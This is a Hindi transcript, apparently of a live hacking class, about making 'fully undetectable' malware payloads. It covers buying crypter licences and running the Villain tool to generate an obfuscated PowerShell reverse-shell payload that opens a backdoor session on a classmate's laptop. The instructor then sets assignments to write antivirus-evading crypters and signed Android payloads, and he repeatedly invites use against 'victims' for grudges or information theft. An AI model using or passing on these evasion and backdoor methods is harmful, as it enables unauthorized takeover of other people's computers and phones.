क्योंकि आपको बनाने, मान लो लेट सपोज आपको खुद का क्रिएट करने आता नहीं है, तो आपको बाई करना पड़ेगा, दूसरा कोई ऑप्शन है नहीं। ठीक है, बाई क्रिप्टर नाउ, यहाँ पे आप जाओगे सिंपली। तो एक चीज बात यह है कि अभी देखते हैं। जस्ट वेट। यहाँ पे आपको लेके आएगी, यहाँ पे आप यहाँ पे प्राइसिंग पे आप आओगे सिंपली। तो यहाँ पे आपको ये प्राइसिंग दिखा रहा है $450। ठीक है, और ये है $150। किसके लिए? आप देखो इसमें, देखो यहाँ पे क्या है, मैं आपको समझा देता हूँ। ये क्या है ना इसको ये क्या बोल रहे हैं, प्राइवेट स्टब बाईपास गारंटी 45 डेज लाइसेंस, और ये है $150 का सिर्फ 10 डेज लाइसेंस का। अब ऐसा इसलिए है गाइज, ऐसा इसलिए है क्योंकि आप ये चीजें जो है ना क्रिप्टर्स वगैरह का, जब आप परचेज कर लेते हो और इससे जब आप क्रिप्ट करते हो तो वो बहुत ही डेंजरस हो जाता है। यानी कि किसी भी विक्टिम में आपने एग्जीक्यूट करा है, उसका पूरा सिस्टम आपके कंट्रोल में होगा, फुल सिस्टम कंट्रोल में होगा, कुछ नहीं कर पाएगा वो सामने वाला। कोई से भी एंटीवायरस हो डजंट अफेक्ट दैट योर क्रिप्टर्स, वो कोई भी। तो यहाँ पे इसलिए इन्होंने बहुत ही ये महंगा देते हैं, सिंपली बहुत ही महंगा देते हैं ये लोग। तो बाईपास गारंटी है, वैलिडिटी फॉर 10 डेज, अनलिमिटेड फाइल्स इंस्क्रिप्शन कितने भी कर लो 10 दिन में। स्पेशल प्राइवेट स्टब ऑन योर हैंड्स, मतलब प्राइवेट आपको आपके लिए बना के देंगे स्टब, मतलब वही जो पेलोड है आपकी। लॉन्गर एफयूडी टाइम, नो फ्री अपडेट्स, इसमें फ्री अपडेट्स नहीं है। 30 डे वीपीएन विथ पोर्ट फॉरवर्डिंग, आपको ये पोर्ट फॉरवर्डिंग 30 डे का वीपीएन के साथ भी दे रहे हैं। यानी कि आपका अगर जैसे सिंपली है ना, आप अभी जो पेलोड बना रहे हो वो आप लोकल नेटवर्क में बना रहे हो, बट अगर आपको वाइड नेटवर्क में, वाइड एरिया नेटवर्क में, वैन में यूज करना है तो उसके लिए आपको पोर्ट फॉरवर्डिंग करनी पड़ेगी। तो ये क्या करते हैं, वीपीएन प्रोवाइड कर रहे हैं विथ पोर्ट फॉरवर्डिंग सिंपली, क्योंकि कई बार कई लोगों को क्या होता है ना, राउटर सपोर्ट नहीं करता पोर्ट फॉरवर्डिंग, बहुत तरह के इश्यूज आते हैं इस वजह से। ये सारी, और यहाँ पे जो है, यहाँ पे आप आएंगे यहाँ पे, तो यहाँ पे आपको बहुत सारी चीज़ें, डिफरेंट चीज़ें, वैलिड फॉर 45 डेज, ये सब। वैलिड 45 डेज का मतलब ये हो जाता है गाइज कि आपका 45 डेज तक तो गारंटी, मतलब वो काम करेगा बढ़िया से, एकदम चलेगा मस्त। 5 फ्री अपडेट्स वगैरह सब कुछ दे रहे हैं, ये सारी चीज़ इसमें दे रहे हैं। तो किसी को परचेज करना है, काफ़ी मतलब इसका यूज़ देखना है तो आप कर सकते हो। हालांकि यहाँ पे कुछ और भी हैं, यहाँ पे लाइक $60 में भी है, $100 में भी है, $175 में भी है। बट एक बात याद रखिएगा, ये शेयर्ड स्टब होते हैं, ठीक है, ये शेयर्ड स्टब होते हैं, मतलब और भी लोगों को ये शेयर इन्होंने ये करेंगे, ठीक है ना। फ्री अपडेट्स मिलेंगे, फुली अनडिटेक्टेबल रिजल्ट्स आएंगे, लेकिन ये और भी लोगों से शेयर करते हैं। तो ये डिपेंड करता है, अगर किसी उसमें से किसी ने, कोई ऐसा महानुभाव है जिन्होंने कहीं पे अपलोड कर दिया है, फिर वहाँ पे फिर आपको दिक्कत हो जाएगी, फिर लाइक यू कांट डू एनीथिंग अबाउट दैट, ठीक है। तो ये उसकी गारंटी भी नहीं देते हैं कि हाँ आपका। तो आप कोई से भी परचेज कर सकते हो इफ़ यू वांट, एक्चुअली में रियल में आप कुछ धमाका करना चाहते हो, अगर आपको कुछ बहुत बड़ी चीज़ करनी है देन यू कैन डू, ठीक है, सिंपल सी चीज़ है। तो कोई परचेज करने जा रहा है क्या, क्रिप्टो परचेज करने जा रहा है कोई? ये मैं हमेशा पूछता हूँ, कोई, लेकिन कोई नहीं करता है ना सर। बट विदाउट टर्मिनल डायरेक्ट रन करवा रहे हैं, तो फिर वो क्या हो रहा है कि अगर पाइथन 2.3 का इशू है तो मतलब, यस, समझा नहीं मैं। ऐसा नहीं है। ऐसा नहीं है, बहुत महंगा। देखो एक्चुअली क्या हुआ ना, क्या हो, देखो मैं ये चीज़ मैं भी परचेज कर लेता, ऐसी कोई बड़ी बात नहीं है, जस्ट। लेकिन इससे कोई फ़ायदा इसलिए नहीं है ना, क्योंकि इनकी वैलिडिटी काफ़ी कम दिन को होती है। अब यार मैं हर बैच में तो परचेज करना पॉसिबल नहीं है। अगर ऐसा भी होता है एटलीस्ट कि एक पर्सनल लाइसेंस दे देते, इवन $500 का भी दे देते, आई कुड हैव परचेज, मतलब वो परचेज कर देता मैं आप लोगों के लिए या आपको डेमोन्स्ट्रेशन के लिए, बट स्टिल कोई फ़ायदा नहीं है। इसलिए अगर किसी को पर्सनल लेवल पे काम है, कुछ ऐसा कुछ करना है, तो बस मैंने आपको तरीका बता दिया है, आप उससे कंप्लीट एफयूडी बना सकते हो। किसी को, विक्टिम को, किसी को कुछ करना है, कोई वट एवर, कुछ यू वांट टू डू समथिंग, देन यू कैन इजीली डू, कोई इशू नहीं है, ठीक है। किसी से इतनी दुश्मनी नहीं है, नहीं, कब किस चीज़ की कैसे ज़रूरत पड़ जाए नोबडी नोज, कब किस चीज़ की कैसे ज़रूरत पड़े ना किसको, कोई नहीं जानता है। दुश्मनी इसकी मतलब बात नहीं है, बहुत तरह की अलग चीज़ होती है दुश्मनी के लिए, थोड़ी ना सिर्फ यूज़ कर सकते हैं। हो सकता है इन्फॉर्मेशन गैदरिंग के लिए भी काफ़ी लोग यूज़ कर सकते हैं, कोई चीज़ ऐसी इन्फॉर्मेशन निकालनी हो, कुछ ऐसा चीज़ करना है तो उसके लिए भी करना है, उसके लिए भी आप कर सकते हो, उसके लिए भी वो चीज़ कर सकते हो, है ना। फिर देखते हैं।
ठीक है, हाँ, इस पे मैं अभी आने वाला था मोहित, तब तक इसने बोल दिया। ठीक है, नेक्स्ट अब एक और चीज़ क्या है गाइस, जो अभी मोहित ने बोला, इस पे हम आने वाले थे। देयर इज़ अ टूल विच इज़ क्वाइट पॉपुलर नाउ डेज, जिसको कि हम बोलते हैं विलन। विलन विलन विलन, इसको हम बोल रहे हैं विलन। ठीक है, विलन क्या है ना, एक अच्छा खासा प्यारा सा टूल है। ठीक है, बेसिकली आपको गिटहब पे मिल जाएगा विलेन टूल। ये बेसिकली अभी बाईपास कर रहा है जो भी आपकी एंटीवायरसेस हैं, विंडोज डिफेंडर स्पेशली, उसको बाईपास कर रहा है। ठीक है, कैसे कर रहा है ना, ये भी आपको, ये पावर शेल स्क्रिप्ट को जनरेट करता है बेसिकली, और कुछ भी नहीं है। सो व्हाट इट इज डूइंग, सी, यहाँ पे ये टूल है, ये है, यहाँ से आप इसको गिट क्लोन कर सकते हो। सिंपली आप इसको गिट क्लोन कर लेना। गिट क्लोन करने के बाद यहाँ पे सिंपली गिट क्लोन करके उसकी रिपोजिटरी क्लोन कर लेना। उसके बाद उस रिपोजिटरी में चले जाना। ठीक है, यहाँ एलएस करोगे, यहाँ पे आपको requirements.txt मिल जाएगी, तो वही pip3 इंस्टॉल रिक्वायरमेंट्स। ठीक है, pip3 वाली कमांड यूज कर लेना ये रिक्वायरमेंट्स को इंस्टॉल करने के लिए। pip3 इंस्टॉल -r जो आती है आपकी कमांड, वो वाला कर लेना। उसके बाद जब आप इंस्टॉलेशन, आप रिक्वायरमेंट्स इंस्टॉल कर लोगे, तो इसको एग्जीक्यूट करना है सिंपली। तो आप सिंपली python villain.py करके एग्जीक्यूट कर सकते हो। जैसे आप गाइज एग्जीक्यूट कर दोगे ना, तो यहाँ पे कोर सर्वर लिसनिंग ऑन ये आपको दे दिया, एक आईपीएन एक पोर्ट आपको मिल गई सिंपली। यहाँ पे हॉक्सेल इंजन, इसके अभी हम फिलहाल हमें इस पे नहीं जाना, हमें सिंपली एक पेलोड अगर जनरेट करना है इसके अंदर में, तो ये बहुत ही आसान एक तरीका है। बेसिकली अभी भी एफयूडी ये काम करता है। इसका जो डिटेल है आप हेल्प कमांड से देख सकते हो। जैसे आप देख सकते हैं यहाँ पे कनेक्ट जनरेट सिवलिंग सेशंस एक्सेप्ट्रा एक्सेप्ट्रा। ठीक है, ये सारी चीज आ रही है। अब गाइस यहाँ पे हमें मान लो कोई जनरेट करना है पेलोड, तो आपने करना है जनरेट। ठीक है भैया, जनरेट कमांड आपको टाइप करना है। अब आपको पता नहीं जनरेट क्या क्या करना है, तो हेल्प लिख के जनरेट टाइप कर लीजिए, आपको पता चल जाएगा जनरेट कैसे करना है। तो आपको सिंपली लिखना है जनरेट ऑपरेटिंग सिस्टम किसके, सॉरी ओएस किसके लिए जनरेट करना है, तो ओएस इज इक्वल टू विंडोज, हमें विंडोज के लिए करना है। बिल्कुल सही है। उसके बाद आपको एल होस्ट देनी है भैया। एल होस्ट में गाइज आप अपनी या तो आईपी दे दो, या तो सिंपली आप अपना जो आपका इंटरफेस है उसका नाम दे दो, उससे वो ऑटोमेटिकली आईपी गैदर कर लेगा। तो हमने ETH 0 दे देना, आईपी देने की कौन सी टेंशन है, हमेशा आईपी देते हैं। तो एल होस्ट ETH 0 कर दिया। और उसके बाद यहाँ पे क्या करना, ऑफस्केट मोड को इनेबल कर दीजिए, यानी कि ऑफस्केशन करेगा, वही इनकोडिंग वगैरह कर देगा जो भी करना है। तो ऑफस्केशन मोड हमने ऑफस्केट कर दिया, सिंपल, बस इतना किया, एंटर किया, ये आपको एक पेलोड जनरेट कर देगा। अब ये पेलोड जो है गाइस आप देखोगे यहाँ पे, तो ये एक पावर शेल की स्क्रिप्ट है, सिंपल। व्हाट इट इज, इट्स अ पावर शेल स्क्रिप्ट कॉपीड टू क्लिपबोर्ड। ये कॉपी हो चुका है, पावर शेल की स्क्रिप्ट है। नाउ व्हाट आई एम गोइंग टू डू, मैं यहाँ पे एक पावर शेल सेशन स्टार्ट कर देता हूँ एक बार, लेट्स सी व्हाट इज हैपनिंग। यहाँ पे मैंने पावर शेल स्टार्ट किया, यहाँ पे मैंने उसको पेस्ट किया, एंड यहाँ पे मैंने एंटर किया। जैसे ही एंटर करोगे, इट्स सेइंग, क्या सेइंग, एग्जीक्यूशन एरर भैया। लेट्स स्टार्ट पावर शेल। अब क्या हो रहा है भाई, just a second।
ओके, यहाँ से हम क्या करते हैं, जस्ट कॉपी इट, open, paste, enter. We do one thing. प्रॉब्लम क्या है भाई? कोई कर रहा है क्या साथ में? एक बार एग्जीक्यूट करके देखो। डिटेक्टेड एंड ब्लॉक बाय एंटीवायरस। नहीं नहीं, यह यहाँ पे ऐसा नहीं, ये डिटेक्ट कैसे हो रहा है भाई? ये अभी तक तो अनडिटेक्टेबल ही है। कोई कर रहा है क्या साथ में? कोई कर, और नमन तुम्हारा डिटेक्ट हुआ? ओके, नमन डिटेक्ट हो गया। पावर सेल में यही एरर आ रही है, पावर सेल में एरर आ रही है। ओके, नहीं ये और कोई कर रहा है? कोई मोहित, हार्दिक, तुम लोग कर रहे हो? कर रहा हूँ, ठीक है। एक काम करते हैं, यहाँ पे कुछ तो एक काम करते हैं, एक नॉर्मल, अगर हम नॉर्मल एग्जीक्यूशन कर और नॉर्मल करते हैं, क्रिएट ETS 0 नॉर्मल करते हैं, तो नॉर्मल तो हमारा ये पार्सल का स्क्रिप्ट आ रहा है यहाँ पे, ठीक है। ये नॉर्मल हमारी स्क्रिप्ट आ रही है बिना ऑब्फस्केशन के, हमने ऑब्फस्केशन ऑन नहीं किया है। एंड देन वी आर डूइंग सो हियर, कंट्रोल V, लेट्स सी। हाँ, ये ब्लॉक्ड, ओके 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 ओके, ये ब्लॉक हो रही है, मतलब ये अभी डिटेक्ट हो रही है ना, यहाँ दिख रहा है ना, यहाँ पे इट्स गेटिंग डिटेक्टेड एक्चुअली। तो ये अभी तक तो डिटेक्ट नहीं हो रहा था, इन्होंने मे बी फिर अभी डिटेक्शन स्टार्ट कर दी होगी, फिर भी फिर ये अपडेट हो जाएगी। फिर देखो यहाँ पे क्या है ना, लेट्स डू वन थिंग, सी यहाँ पे देखो, तो एक काम करते हैं, ये बार बार ऑब्फस्केट करता है, तो डू वन थिंग, हम इसको ना ऑब्फस्केशन में एक बार और चलाते हैं, एक बार और जनरेट करते, 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 एक बार और जनरेट करते हैं। लेट्स कॉपी इट, कॉपी सिलेक्शन एंड लेट चेक, इसको करता ही नहीं, इसको भी कर दे रहा है ना, इट्स डूइंग कंट्रोल V एंड अगेन उसको ये कर पा रहा है, इसको ये फिर से ये डिटेक्ट हो गया, मतलब अभी कुछ दिनों पहले की बात है, ये अनडिटेक्टेबल था, ये जो विलेन टूल से था, अभी इसको डिटेक्ट करना शुरू कर दिया डिफेंडर ने, मतलब बहुत ही फास्ट अगेन जो है ये इन्होंने स्टार्ट कर दिया। अभी देखते हैं एक बार ये काम होती है, वायरस थ्रेट प्रोटेक्शन चलते हैं, ये देखो ये पावर सेल को डिटेक्ट कर रहे हैं यहाँ पे, ठीक है। यहाँ पे ये देख रहे हो ब्लॉक ब्लॉक आ रहा है यहाँ पे, अभी जब इसको अगर हम इसको बंद कर देंगे तो ये डिटेक्शन बंद हो जाएगी, और क्या।
हालांकि रियल टाइम प्रोटेक्शन में ये शायद डिटेक्ट देखते हैं। हाँ, डिटेक्ट ही हो रहा है ये। अभी मैंने बिना उसके हमने किया तो यहाँ पे आप यहाँ पे हमारा सेशन आ चुका है। यू कैन सी बैकडोर सेशन एस्टैब्लिश्ड है ना। सो इट्स बेसिकली अ डिटेक्शन जो कि अब इनमें वापस से आ चुका है। कोई फ़ायदा नहीं है अब इसका बेसिकली, बट स्टिल ये अपडेट करते रहते हैं। इनका ये मानना है ऐसा कि वी जस्ट कीप अपडेटिंग, जो भी है वो अपडेट हम करते रहते हैं। ठीक है, तो यहाँ पे अब आप आज का आपका सेशन आ चुका है। सेशंस पे क्लिक करके एंटर करोगे तो यू विल सी कि यहाँ पे हमारा सेशन आ चुका है। सिंपली जो भी सेशन आपने वो किया था वो सेशन आपका आ चुका है। अब सेशन से आपको इंटरेक्ट करना है, शेल आपको लाना है, तो आप शेल कमांड टाइप कीजिएगा यहाँ पे। एंड यहाँ सेशन आईडी जो है ये वाली आप यहाँ पे डाल दीजिएगा, कंट्रोल, ये हो गया। तो यहाँ पे आपका शेल मिल जाएगा। देखो अभी आप TN वाले लैपटॉप के अंदर में हो। बेसिकली यू कैन सी यू कैन सी यू आर इन द डायरेक्टरी ऑफ TN, लाइक TN वाले जो लैपटॉप है उसके अंदर हम अभी घुस चुके हैं। ये डायरेक्टरी वगैरह आ गई यहाँ पे। सिस्टम इन्फो कमांड आई थिंक यहाँ पे चलेगी आपकी। सो बेसिकली यहाँ पे आपको जो भी है डायरेक्टरी वगैरह वट एवर दे आर वेटिंग, यहाँ पे जो भी आपको उठा के यहाँ पे दे दिया है यहाँ पे। तो चलिए, बट ये डिटेक्ट हो रही है। ठीक है, आप लोगों में से किसी का ऐसा है जो डिटेक्ट नहीं हो रहा हो, चल गया हो? मतलब बिना डिटेक्शन के चल रहा है यश? यस, डिटेक्ट नहीं हुआ तुम्हारा? हाँ यश, ठीक है। देखो क्या होगा ना, पहली बार हो सकता है तुम्हारे डिटेक्ट ना हुआ हो, पहली बार अब हो सकता है डिटेक्ट ना हुआ हो। क्योंकि मैंने भी पहले जब यूज़ किया था तो वो डिटेक्ट नहीं हुआ था, बट स्टिल बाद में वो फिर से डिटेक्ट हो जाएगी। वो आपकी जो एंटीवायरस है ना वो उसको समझ लेगा, वो आपका वो समझ लेगा। ठीक है, तो डिटेक्ट हो जाएगी। तो ऐसा कुछ वो नहीं है। क्या है जील? इन्वोक ऑब्फस्केशन क्या है? टूल है? हाँ हाँ, समझ गया। वैसे देखो पावर सेल के लिए बहुत सारे टूल्स हैं, देयर आर लॉट ऑफ टूल्स रिलेटेड टू पावर सेल। पावर सेल इंजेक्शन वगैरह करते हैं, बहुत तरीके की चीज़ें करते हैं, आप उनका यूज़ कर सकते हो, ऐसा कुछ नहीं है। आप वेल वगैरह का भी यूज कर सकते हो। देखो यहाँ पे ये डिटेल सिस्टम इन्फो आपने किया तो पूरी सिस्टम की जो इन्फो है वो आपकी जो विक्टिम सिस्टम है यहाँ पे आ गई है। बट इससे देखो इससे क्या मतलब, यहाँ पे क्या क्या यहाँ पे क्या हो रहा है ना, यहाँ पे सिंपल चीज़ें क्या हो रही है मैं आपको समझा देता हूँ। देखो ये वेल हो या कुछ भी हो या विलेन हो, कुछ भी उससे मतलब नहीं है। यहाँ पे आप लोगों को एक काम करना है, एज अ टास्क मैं आपको बता रहा हूँ। यहाँ पे एक मिनट, यूज वेल इन काली। ऑलरेडी आप ऐप इंस्टॉल वेल करके इंस्टॉल कर सकते हो वेल को। ठीक है, ऐप इंस्टॉल वेल करना है, अपने आप सारी इंस्टॉलेशन कर लेगा, टाइम लगेगा। वेल इंस्टॉल टू ट्राई टू क्रिएट FUD पेलोड। ट्राई करना कि FUD पेलोड कोई सा भी पाइथन हो, EXE हो, कोई सा भी आपको ट्राई करना हो, आप एक बार ट्राई करना। ये वेल का मतलब हिट एंड ट्रायल मेथड है, इसके अलावा आप कुछ कर भी नहीं सकते हो। खुद से क्रिएट अगर करना है आपको, यू कांट डू एनीथिंग हिट एंड ट्रायल के अलावा अंटिल यू यूज अ क्रिप्टर। अब ये मुझे बता दो, इसमें यहाँ पे ये रियल टाइम प्रोटेक्शन ऑन कर लेते हैं क्या? कोई फायदा नहीं है ऑफ करने का। मुझे ये बताओ, आप में से लाइक C या C# वगैरह में कोडिंग कोई करता है क्या? लाइक थोड़े अच्छे लेवल पे कोई, एनीवन हियर? आई डोंट थिंक कि कोई करता होगा, राइट? C या C# में कोई कोडिंग करता है क्या? नहीं करता ना। पाइथन में कोई करता है ना? पाइथन में तो शायद हार्दिक करता ही है। ठीक है, वाई एम आस्किंग, सुनो, वाई एम आस्किंग। अब देखो मेरे डोमेन का तो कुछ है नहीं, ये प्रोग्रामिंग एंड ऑल, इन चीज़ों पे ना मैं इतना टाइम दे सकता हूँ ना इतना दिमाग लगा सकता हूँ। अगर तुम में से कोई भी ऐसा है जो पाइथन में, जैसे कि हार्दिक है पाइथन में अच्छा है उसका काफ़ी, या कोई और भी है, तो इफ़ यू कैन ट्राई टू क्रिएट अ सिंपल क्रिप्टर। हाँ, विलन हो गया पहली बार हो जाएगा, दूसरी बार में भी प्रॉब्लम होगी।
यू कैन ट्राई टू क्रिएट सिंपल क्रिप्टर। ट्राई करेगा कोई पाइथन में हार्दिक ट्राई करना है? करूंगा, ठीक है, मतलब जितना भी टाइम लगे कोई इशू नहीं है। नहीं अभी की बात नहीं कर रहा, अभी तो मैं जानता हूँ तुम्हारे एग्जाम्स हैं, मतलब जितना भी टाइम लगे उससे मतलब नहीं है। सर मैं सी में करता हूँ ट्राई, ठीक है करो। छोटा सा एक सिंपल क्रिप्टर बनाना है जो सिंपली क्या करेगा ना, किसी भी आपके पेलोड को EXE स्पेशली EXE पेलोड को डिफरेंट एंटीवायरस इंजन्स के लिए इवेड करेगा, बस। ठीक है करो, ट्राई करो, इवेड करेगा बस। अगर ये आप में से किसी ने भी कर दिया, ये एक तरह का यू कैन टेक इट एज असाइनमेंट ले लो, एक तरह का टास्क ले लो, कुछ भी ले लो, तो मैं आपको गारंटी देता हूँ, लाइक उसको बार बार अपडेट भी करना होगा आपको कि जब को डिटेक्ट हो जाए तो नेक्स्ट टाइम वो कौन सा एल्गो होगा, कौन सी वो करके लगानी पड़ेगी। अगर वो हो जाती है तो आपको खुद नहीं पता कि क्या से क्या हो सकता है उसकी मदद से। यू कैन सी कितनी कॉस्टली सेल हो रही है, पता है ना तुम्हें? तो तुम मतलब क्या से क्या हो सकता है, यू कांट इमेजिन इफ़ यू आर एबल टू क्रिएट दैट। काफ़ी मुश्किल है ये मैं मानता हूँ, बट स्टिल एक गिव इट अ ट्राई करके देखो। कोई से भी आप में से कोई भी हो, ट्राई करके जस्ट गिव इट अ ट्राई, ओके, एक बार ट्राई करके देखना है। नेक्स्ट थिंग ठीक है। नाउ जैसा कि मैंने पहले बोला, यहाँ पे पूरा का पूरा हिट एंड ट्रायल मेथड होता है। आपके जो भी पेलोड हैं उसको एफयूडी क्रिएट करना। एफयूडी जब क्रिएट नहीं हुआ तो फिर पेलोड बनाने का फायदा क्या हुआ? मेरे को यही लगता है, इसलिए मैं मेटास्प्लॉइट को बहुत ज़्यादा वो नहीं करता, खींचता नहीं हूँ फालतू का, क्योंकि बिना एफयूडी का कोई फायदा नहीं। और एफयूडी के लिए आप टेम्पोररी एफयूडी तो बना दोगे, जैसे ये विलेन से हो गया, बहुत लोगों का टेम्पोररी अभी बन जाएगा, बट क्या फायदा उसका, कुछ टाइम के बाद वो अगेन डिटेक्शन शुरू हो जाएगी, ठीक है। तो वो पॉसिबल है, वो इम्पॉसिबल है कि आप डायरेक्टली एकदम से एफयूडी बना दो बिना क्रिप्टर के या बिना किसी प्रॉपर एल्गोरिदम यूज किए किसी प्रोग्रामिंग लैंग्वेज का। इट्स नॉट पॉसिबल, ठीक है। उसको भी फिर से वो अपडेट करते रहना पड़ेगा। देख रहे हैं जो सेल कर रहे हैं $150-200 के, वो भी 10 दिनों का, इतने दिनों का लाइसेंस दे रहे हैं, क्योंकि उनको पता है कि उससे ज्यादा टाइम में हो सकता है वो डिटेक्ट होना शुरू हो जाए, इसलिए वो रिस्क नहीं लेना चाहते, बिकॉज दे हैव टेकन द मनी। दैट्स द मेन चीज, ठीक है। ये हो गया। अब आपका यहाँ पे टास्क में, यहाँ पे एक टास्क ये है, थर्ड, क्रिएट एंड्रॉयड पेलोड फॉर लेटेस्ट एंड्रॉयड वर्जन। अब ये जो है ना, क्रिएट एंड्रॉयड एफयूडी पेलोड, एंड्रॉयड वाले केस में भी हो सकता है, मैं आपको थोड़ा बहुत आइडिया देता हूं। एंड्रॉयड के केस में जब भी आप पेलोड क्रिएट करने की कोशिश करो, या लाइक इफ यू ट्राई टू क्रिएट एंड्रॉयड पेलोड, देन हमेशा ध्यान रखो कि उस पेलोड को साइन करो आप, ठीक है। उस पेलोड को ऑलवेज ट्राई टू साइन दैट, क्योंकि साइंड होगी तभी वो थोड़ा बहुत चांस भी है कि कुछ, मतलब वो बचने के कुछ थोड़े बहुत जो बोलते हैं कि चांस होते हैं, वो चांस हो सकते हैं। उसके बाद आप उसको साइन जब कर दोगे, लाइक की टूल वगैरह जो आते हैं उनसे आप कर सकते हो, ठीक है। या बेसिकली मतलब जो जार साइनर्स आते हैं उनसे आप कर लेना, जार साइनर्स वगैरह से आपका वो साइन हो जाएगी, ठीक है। उसका वेरीफाई वगैरह होता है वो भी कर लेना, ठीक है। जिप अलाइन वगैरह जो है उससे कर लेना। मतलब ये सब जो है कुछ टूल्स हैं जिनका यूज आप कर सकते हो, जिप अलाइन हो गया, जार साइनर हो गया, ठीक है। तो ये सारी चीजें करना, एक बार ट्राई करना, जस्ट ट्राई टू क्रिएट एन एफयूडी पेलोड एंड्रॉयड के अंदर में ये ऑप्शंस का यूज करके। लेट्स सी कुछ होता है कि नहीं। हालांकि फिर भी स्टिल अगर आप कर भी लेते हो गाइज, अगेन मैं स्टिल बोल रहा हूँ कि अगेन वो कुछ टाइम के लिए ही होगा, वो आपस से जो है आपका गूगल प्ले प्रोडक्ट उसको डिटेक्ट कर ही लेगा, ठीक है। लेटेस्ट एंड्रॉयड के लिए, ओल्ड के लिए तो आप कर ही लोगे, कोई प्रॉब्लम नहीं है। बट अगर यहाँ पे आपने देखा होगा गाइज, एम स्पाई जैसे टूल्स, जैसे एम स्पाई वगैरह जैसे टूल्स होते हैं, जो स्पाई वाले टूल्स होते हैं, उनमें क्या होता है वो आपने देखा होगा गाइज। एम स्पाई के टूल्स जो होते हैं, आप जब वो टूल परचेज करते हो ऑलवेज, तो वो ज़्यादातर चीज़ें रूटेड डिवाइस में ही सही से कर पाते हैं। पहली बात, ऑलवेज काफ़ी कॉस्टली होता है, मतलब हर महीने का अच्छा खासा पैसा आपसे लेंगे, क्योंकि उनके डेवलपमेंट पे, उनके अपडेशन पे काफ़ी पैसा लगता है, ठीक है। iOS के लिए ज़्यादा बिल्कुल भी मतलब वो नहीं है, iOS का तो बिल्कुल ही कचरा, मतलब iOS का तो सोच भी नहीं सकते फिलहाल के लिए, ना कभी सोचा है मैंने। iOS पे ट्राई करो, अगर इफ यू वांट टू ट्राई इट। जिस इन्वायरमेंट वो iOS से तो पाला ही पड़ा रिसेंटली में, बट iOS का बहुत ही मुश्किल है, मतलब जेल ब्रेकिंग से पॉसिबल हो सकता है,
एक्सप्लॉइट्स, बिना एक्सप्लॉइट्स के वो पॉसिबल नहीं है। जेल ब्रेकिंग करो, एक्सप्लॉइट्स हो, देन इज पॉसिबल। होता है यार, आईओएस के एक्सप्लॉइट्स तो मिलते ही हैं, तुमने देखा ही होगा, लीक हुए कई बार, कई तरह की चीज़ें हुई हैं, तो एक्सप्लॉइट्स तो होंगे ही, बट वो बहुत ही रेयर हैं, लाइक दे आर वेरी रेयर टू गेट, रेयर टू वर्क, रेयर टू एग्जीक्यूट। तो एक बार टास्क करके लाओगे तुम लोग ये वाले, पहले एक बार इसके स्क्रीनशॉट ले लेना। पाइथन पेलोड एमएसएफ वेनो में पाइथन टू एनवायरनमेंट में ट्राई करके देखना। मुझे इससे ज़्यादा कुछ वो नहीं है, एक्सपेक्टेशन नहीं है, बट स्टिल जैसे कि यश ने बोला था, ट्राई यूजिंग एन स्क्रिप्ट कर लेना। क्रिएट एफईडी पेलोड पाइथन में, सॉरी लेटेस्ट एंड्रॉइड के लिए वर्जन के लिए, और वेल का यूज़ करना है काली के लिए, काली में एफईडी पेलोड क्रिएट करने के लिए, ठीक है, गॉट इट। चलो ये टास्क कर लिया, कर लेने के बाद टास्क करके एक बार ट्राई करना, ठीक है, करने का। ओके, तो जस्ट डू इट, जस्ट डू द टास्क, ट्राई टू क्रिएट द एफईडी पेलोड। जिसका भी बने प्लीज लेट मी नो इन द ग्रुप, जिसका जब भी जैसे ही हो जाए, जैसे ही आपका पेलोड बन जाए, कौन कौन ट्राई करेगा पहले बता दो यार एक बार, कौन कौन ट्राई करेगा, मतलब एक्चुअली जो ट्राई करेगा, ये आपका एक तरह से असाइनमेंट समझ लो, इस पे बहुत कुछ डिपेंड भी करता है आपकी चीज़ों का, क्योंकि वो देखूंगा मैं कौन कितना ट्राई कर रहा है एटलीस्ट, क्योंकि आपके पास बहुत सारा टाइम है, ठीक है, आपके पास बहुत सारा टाइम है ये चीज़ें करने के लिए, ये चीज़ों में टाइम लगता है, काफ़ी टाइम लगता है, तो आपके पास बहुत सारा टाइम है, जस्ट यूटिलाइज दैट। लेट्स सी हु इज डूइंग फर्स्ट, कौन कर पा रहा है। याद रखना गाइस हमेशा, EXE, APK एंड पाइथन, ये तीन ही आपका होना चाहिए एक्सटेंशन, बस, उसके अलावा कुछ नहीं। PY वाले पॉसिबल हैं कि वो हो जाएं आराम से, पाइथन वाले जो है वो आराम से हो सकते हैं, आई एग्री, ठीक है, बट ट्राई करना है APK एंड EXE इज द मेन थिंग, APK एंड EXE इज द मेन थिंग, ठीक है गाइस। ओके चलो, सो लेट्स सी क्या